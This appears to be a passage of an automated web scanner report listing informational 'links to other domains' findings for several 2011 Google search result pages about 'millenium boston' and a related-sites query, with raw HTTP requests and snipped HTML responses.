<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NGLhWghEPy0J:www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','18','','0CMIBECAwEQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.oyster.com/boston/hotels/millennium-bostonian/" class=l onmousedown="return clk(this.href,'','','','19','','0CMUBEBYwEg')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VlMvBwJVSh4J:www.oyster.com/boston/hotels/millennium-bostonian/+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','19','','0CMsBECAwEg')">Cached</a>
...[SNIP]...

17.274. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=millenium+boston&hl=en&prmd=ivnscm&source=lnms&tbs=vid:1&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=mode_link&ct=mode&cd=3&ved=0CCUQ_AUoAg

The response contains the following links to other domains:

http://bigthink.com/ideas/2834
http://img.youtube.com/vi/9GbYywWgSIQ/default.jpg
http://img.youtube.com/vi/GNJ209hycpA/default.jpg
http://img.youtube.com/vi/_Ygc4S_Sy5c/default.jpg
http://img.youtube.com/vi/bn8BW9UlwbQ/default.jpg
http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg
http://img.youtube.com/vi/zNqc4wnj974/default.jpg
http://img.youtube.com/vi/zphTL6asEcc/default.jpg
http://tripwow.tripadvisor.com/tripwow/ta-009e-e8c0-2d9b
http://ulocal.thebostonchannel.com/_moving-vietnam-wall-millenium-park-west-roxbury/VIDEO/791506/61862.html
http://www.autoexposure.co.uk/vehicle.cfm?Id=AETV28708568&Image=Video
http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=v1
http://www.youtube.com/view_play_list?p=E602408537B69D96
http://www.youtube.com/watch?v=GNJ209hycpA
http://www.youtube.com/watch?v=_Ygc4S_Sy5c
http://www.youtube.com/watch?v=iHkBLYEKQ-w
http://www.youtube.com/watch?v=zNqc4wnj974
http://www.youtube.com/watch?v=zphTL6asEcc

Request

GET /search?q=millenium+boston&hl=en&prmd=ivnscm&source=lnms&tbs=vid:1&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=mode_link&ct=mode&cd=3&ved=0CCUQ_AUoAg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:23 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"x3xJTeDiEcT_lgeriIA4",kEXPI:"17259,1729
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v-3560004041311514169" href="/url?q=http://www.youtube.com/watch%3Fv%3DzphTL6asEcc&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CDYQuAIwAA&usg=AFQjCNHpYRfjRU-sKMBe0_0mSSh9RHCn6A" ><img src="http://img.youtube.com/vi/zphTL6asEcc/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=zphTL6asEcc" class=l onmousedown="return clk(this.href,'','14886740032398037447','','1','','0CDUQtwIwAA')"><em>
...[SNIP]...
<a id="v-8612851517419273236" href="/url?q=http://www.youtube.com/watch%3Fv%3DiHkBLYEKQ-w&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CDoQuAIwAQ&usg=AFQjCNEc90Zcv0pdn5RnVQ8hg9kmxmIUUw" ><img src="http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=iHkBLYEKQ-w" class=l onmousedown="return clk(this.href,'','9833892556290278380','','2','','0CDkQtwIwAQ')">04-Backstreet Boys Live in <em>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/view_play_list%3Fp%3DE602408537B69D96&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CD4Q7gcwAg&usg=AFQjCNG7CDKwNuIu1LbQkWkk5Bsv_J8C1Q"><img src="http://img.youtube.com/vi/9GbYywWgSIQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s2 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/view_play_list%3Fp%3DE602408537B69D96&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CD4Q7gcwAg&usg=AFQjCNG7CDKwNuIu1LbQkWkk5Bsv_J8C1Q"><img src="http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s1 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/view_play_list%3Fp%3DE602408537B69D96&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CD4Q7gcwAg&usg=AFQjCNG7CDKwNuIu1LbQkWkk5Bsv_J8C1Q"><img src="http://img.youtube.com/vi/bn8BW9UlwbQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s0 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/view_play_list?p=E602408537B69D96" class=l onmousedown="return clk(this.href,'','7962084160143999412','','3','','0CD0QywgwAg')">Backstreet Boys - <em>
...[SNIP]...
<a id="v1788622654261064336" href="/url?q=http://www.youtube.com/watch%3Fv%3DGNJ209hycpA&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CEYQuAIwAw&usg=AFQjCNHcYl9g1MWK2Mhx0MvwKoN0IecAcw" ><img src="http://img.youtube.com/vi/GNJ209hycpA/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=GNJ209hycpA" class=l onmousedown="return clk(this.href,'','1788622654261064336','','4','','0CEUQtwIwAw')">15-Backstreet Boys Live in <em>
...[SNIP]...
<a id="v-3685460846111885378" href="/url?q=http://www.youtube.com/watch%3Fv%3DzNqc4wnj974&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CEoQuAIwBA&usg=AFQjCNH72Rgocu_f2b3KdNN4sO2IDlx16Q" ><img src="http://img.youtube.com/vi/zNqc4wnj974/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb5 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=zNqc4wnj974" class=l onmousedown="return clk(this.href,'','14761283227597666238','','5','','0CEkQtwIwBA')">11-Backstreet Boys Live in <em>
...[SNIP]...
<h3 class=r><a href="http://tripwow.tripadvisor.com/tripwow/ta-009e-e8c0-2d9b" class=l onmousedown="return clk(this.href,'','10539905228657202830','','6','','0CE0QtwIwBQ')">Blue Hills And <em>
...[SNIP]...
<h3 class=r><a href="http://bigthink.com/ideas/2834" class=l onmousedown="return clk(this.href,'','14370886124198173941','','7','','0CFEQtwIwBg')" title="What is the Show Me Poverty Action Tour? | John Legend | Big Think">What is the Show Me Poverty Action Tour? | John <b>
...[SNIP]...
<h3 class=r><a href="http://ulocal.thebostonchannel.com/_moving-vietnam-wall-millenium-park-west-roxbury/VIDEO/791506/61862.html" class=l onmousedown="return clk(this.href,'','6878633426385711071','','8','','0CFUQtwIwBw')">moving vietnam wall <em>
...[SNIP]...
<h3 class=r><a href="http://www.autoexposure.co.uk/vehicle.cfm?Id=AETV28708568&Image=Video" class=l onmousedown="return clk(this.href,'','597166181954965068','','9','','0CFkQtwIwCA')" title="Used LAND ROVER FREELANDER 1.8i Station Wagon Millenium for sale in Boston, Lincolnshire">Used LAND ROVER FREELANDER 1.8i Station <b>
...[SNIP]...
<a id="v-177860431785571433" href="/url?q=http://www.youtube.com/watch%3Fv%3D_Ygc4S_Sy5c&sa=X&ei=x3xJTeDiEcT_lgeriIA4&ved=0CF4QuAIwCQ&usg=AFQjCNGEWSWjgVVqmvRNkfKWC6E0zDz9fA" ><img src="http://img.youtube.com/vi/_Ygc4S_Sy5c/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb10 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=_Ygc4S_Sy5c" class=l onmousedown="return clk(this.href,'','18268883641923980183','','10','','0CF0QtwIwCQ')">01-Backstreet Boys Live in <em>
...[SNIP]...

17.275. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg

The response contains the following links to other domains:

http://cnx.org/content/m10865/latest/
http://en.wikipedia.org/wiki/Electronic_commerce
http://erc.unesco.org/websitetoolkit/en/guide/p3.htm
http://forums.hostsearch.com/showthread.php?15639-How-is-e-tailing-related-to-e-commerce
http://in.answers.yahoo.com/question/index?qid=20101203211238AAa40sx
http://map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/?vgnextoid=6f438182fbf54210VgnVCM100000e1d76180RCRD
http://webcache.googleusercontent.com/search?q=cache:0jK2TZZG-CcJ:www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm+related:www.e&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9udMiEd9C4YJ:www.fsis.usda.gov/News_%26_Events/Agenda_Traceability_031010/index.asp+related:www.e&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:EbScv4wHmsAJ:erc.unesco.org/websitetoolkit/en/guide/p3.htm+related:www.e&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Evk0-NEhFUsJ:en.wikipedia.org/wiki/Electronic_commerce+related:www.e&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Lv7ktS2B8NoJ:www.umbc.edu/wmst/forums.html+related:www.e&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:spYQnocqe2AJ:cnx.org/content/m10865/latest/+related:www.e&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:weYNss95_hIJ:forums.hostsearch.com/showthread.php%3F15639-How-is-e-tailing-related-to-e-commerce+related:www.e&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:zoHaoR0QzJUJ:www.1000ventures.com/business_guide/ipr/e-commerce_main_bywipo.html+related:www.e&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.1000ventures.com/business_guide/ipr/e-commerce_main_bywipo.html
http://www.fsis.usda.gov/News_&_Events/Agenda_Traceability_031010/index.asp
http://www.umbc.edu/wmst/forums.html
http://www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm
http://www.youtube.com/results?hl=en&q=related:www.e&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:35 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.e - Google Search</title><script>window.google={kEI:"03xJTZm3G4vAgQevz_zhDw",kEXPI:"17259,17291
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=related:www.e&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.umbc.edu/wmst/forums.html" class=l onmousedown="return clk(this.href,'','','','1','','0CCMQFjAA')">Women- and Gender-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Lv7ktS2B8NoJ:www.umbc.edu/wmst/forums.html+related:www.e&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm" class=l onmousedown="return clk(this.href,'','','','2','','0CCcQFjAB')">Research <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0jK2TZZG-CcJ:www.uwex.edu/ces/csreesvolmon/EColi/RelatedResearch.htm+related:www.e&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCkQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://forums.hostsearch.com/showthread.php?15639-How-is-e-tailing-related-to-e-commerce" class=l onmousedown="return clk(this.href,'','','','3','','0CCoQFjAC')">How is <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:weYNss95_hIJ:forums.hostsearch.com/showthread.php%3F15639-How-is-e-tailing-related-to-e-commerce+related:www.e&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:weYNss95_hIJ:forums.hostsearch.com/showthread.php%3F15639-How-is-e-tailing-related-to-e-commerce+related:www.e&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com','','','','3','','0CC4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://in.answers.yahoo.com/question/index?qid=20101203211238AAa40sx" class=l onmousedown="return clk(this.href,'','','','4','','0CC8QFjAD')">Question <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hPuxMLLyT28J:in.answers.yahoo.com/question/index%3Fqid%3D20101203211238AAa40sx+related:www.e&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com','','','','4','','0CDMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fsis.usda.gov/News_&_Events/Agenda_Traceability_031010/index.asp" class=l onmousedown="return clk(this.href,'','','','5','','0CDQQFjAE')">Agenda, FSIS Product Tracing <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9udMiEd9C4YJ:www.fsis.usda.gov/News_%26_Events/Agenda_Traceability_031010/index.asp+related:www.e&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9udMiEd9C4YJ:www.fsis.usda.gov/News_%26_Events/Agenda_Traceability_031010/index.asp+related:www.e&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com','','','','5','','0CDYQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.1000ventures.com/business_guide/ipr/e-commerce_main_bywipo.html" class=l onmousedown="return clk(this.href,'','','','6','','0CDcQFjAF')">Intellectual Property Issues <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zoHaoR0QzJUJ:www.1000ventures.com/business_guide/ipr/e-commerce_main_bywipo.html+related:www.e&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CDkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/?vgnextoid=6f438182fbf54210VgnVCM100000e1d76180RCRD" class=l onmousedown="return clk(this.href,'','','','7','','0CDsQFjAG')">PPSM 21 Technical Revisions <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9v5_HzJbdiwJ:map.ais.ucla.edu/portal/site/UCLA/menuitem.789d0eb6c76e7ef0d66b02ddf848344a/%3Fvgnextoid%3D6f438182fbf54210VgnVCM100000e1d76180RCRD+related:www.e&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CD0QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://cnx.org/content/m10865/latest/" class=l onmousedown="return clk(this.href,'','','','8','','0CD4QFjAH')">The Circle of Fifths</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:spYQnocqe2AJ:cnx.org/content/m10865/latest/+related:www.e&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEIQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://erc.unesco.org/websitetoolkit/en/guide/p3.htm" class=l onmousedown="return clk(this.href,'','','','9','','0CEQQFjAI')">UNESCO - Create and Maintain a Website and other IT-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EbScv4wHmsAJ:erc.unesco.org/websitetoolkit/en/guide/p3.htm+related:www.e&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CEYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Electronic_commerce" class=l onmousedown="return clk(this.href,'','','','10','','0CEgQFjAJ')">Electronic commerce - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Evk0-NEhFUsJ:en.wikipedia.org/wiki/Electronic_commerce+related:www.e&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CEoQIDAJ')">Cached</a>
...[SNIP]...

17.276. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=millenium+boston&hl=en&prmd=ivnscm&ei=_CVITc2VBYOClAeFy82iBA&start=10&sa=N

The response contains the following links to other domains:

http://boston.centralparking.com/Hotels/Boston-Millennium-Bostonian-Hotel-Parking.html
http://boston.citysearch.com/profile/34252935/boston_ma/millenium_day_care_ctr.html
http://webcache.googleusercontent.com/search?q=cache:4LPpqUSwa1oJ:www.urbanspoon.com/ps/4/811/Boston/Hotels/Millennium-Bostonian-Hotel.html+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:8n3a884R2tUJ:www.tripadvisor.ca/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:HaSfWxa86TIJ:boston.citysearch.com/profile/34252935/boston_ma/millenium_day_care_ctr.html+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:OAbNaajeITwJ:www.bostonmagazine.com/weddings/detail/millenium_bostonian_hotel+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Prb9nTKCJe8J:www.cityofboston.gov/parks/urbanwilds/DumpShoreline.asp+millenium+boston&cd=16&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:VlMvBwJVSh4J:www.oyster.com/boston/hotels/millennium-bostonian/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:XujQGXii1KwJ:www.travel-library.com/hotels/north_america/usa/massachusetts/boston/millennium_bostonian.html+millenium+boston&cd=15&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:j_SRI2QPTCUJ:boston.centralparking.com/Hotels/Boston-Millennium-Bostonian-Hotel-Parking.html+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:k_3IuOMLY9cJ:wikimapia.org/1190493/Millenium-Park+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:maqKWhRuXn4J:www.bc.edu/offices/help/security/copyright/dmca.html+millenium+boston&cd=20&hl=en&ct=clnk&gl=us&source=www.google.com
http://wikimapia.org/1190493/Millenium-Park
http://www.bc.edu/offices/help/security/copyright/dmca.html
http://www.bostonmagazine.com/weddings/detail/millenium_bostonian_hotel
http://www.cityofboston.gov/parks/urbanwilds/DumpShoreline.asp
http://www.oyster.com/boston/hotels/millennium-bostonian/
http://www.travel-library.com/hotels/north_america/usa/massachusetts/boston/millennium_bostonian.html
http://www.tripadvisor.ca/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.urbanspoon.com/ps/4/811/Boston/Hotels/Millennium-Bostonian-Hotel.html
http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?q=millenium+boston&hl=en&prmd=ivnscm&ei=_CVITc2VBYOClAeFy82iBA&start=10&sa=N HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

17.277. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=millenium+boston&hl=en&prmd=ivnscm&source=univ&tbs=plcs:1&tbo=u&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=local_group&ct=more-results&resnum=4&ved=0CIABELUDMAM

The response contains the following links to other domains:

http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.claymath.org/
http://www.milleniumdental.net/
http://www.millenniumdaycare.com/
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/facilities/
http://www.millenniumhotels.com/millenniumboston/gallery/index.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html
http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html
http://www.mlnm.com/
http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&resnum=4&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /search?q=millenium+boston&hl=en&prmd=ivnscm&source=univ&tbs=plcs:1&tbo=u&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=local_group&ct=more-results&resnum=4&ved=0CIABELUDMAM HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"xHxJTeWBLsP7lwfzqfE2",kEXPI:"17259,1729
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&resnum=4&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCQQFjAA')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCkQFjAB')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','5','','0CDkQFjAE')"><em>
...[SNIP]...
